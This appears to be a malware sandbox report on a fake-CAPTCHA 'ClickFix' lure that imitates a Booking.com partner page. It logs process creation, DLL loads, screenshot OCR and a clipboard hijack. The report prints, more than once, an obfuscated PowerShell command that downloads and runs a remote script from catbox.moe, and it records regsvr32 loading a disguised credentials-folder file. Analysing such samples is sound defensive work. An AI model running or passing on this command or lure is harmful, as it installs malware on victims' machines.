Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"

Persistence and Installation Behavior

Source: screenshot OCR Text: -8 x about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter 09:20 ENG p Type here to search SG 29/05/2025
Source: screenshot OCR Text: -8 about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. '.psl I)" 0K to complete verification" v Open: 0K 09:20 ENG p Type here to search SG 29/05/2025
Source: screenshot OCR Text: -8 about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. nsfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj061d.txt') (Senv v Open: 0K 09:20 ENG p Type here to search SG 29/05/2025
Source: screenshot OCR Text: e about:blank -8 Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C Undo 2. Press CTRL + V Cut 3. Press Enter Copy Paste Delete Select All Right to left Reading order Run Show Unicode control characters Insert Unicode control character Type the nam resource, and open IME Reconversion Open: 09:20 ENG p Type here to search SG 29/05/2025
Source: screenshot OCR Text: e about:blank -8 Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. shell -nop h -e b ass -c "Stat-BitsTransfer Open: 09:20 ENG p Type here to search SG 29/05/2025
Source: Chrome DOM: 0.2 OCR Text: Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Privacy - 'Tenn.: Verification Steps 1. Press Windows Button 'C 2. Press CTRL + V 3. Press Enter
Source: screenshot OCR Text: -8 about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! c I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run nl>l Type the e of a program, folder, document or Internet resource, and Windows will open It for you. Open: 09:20 ENG p Type here to search SG 29/05/2025
Source: screenshot OCR Text: -8 x about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! c I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter 09:20 ENG p Type here to search SG 29/05/2025
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Clipboard modification: powershell -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: \KnownDlls\BitsProxy.dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7716
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2122
Source: C:\Windows\System32\svchost.exe TID: 6452 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484 Thread sleep count: 7716 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484 Thread sleep count: 2122 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
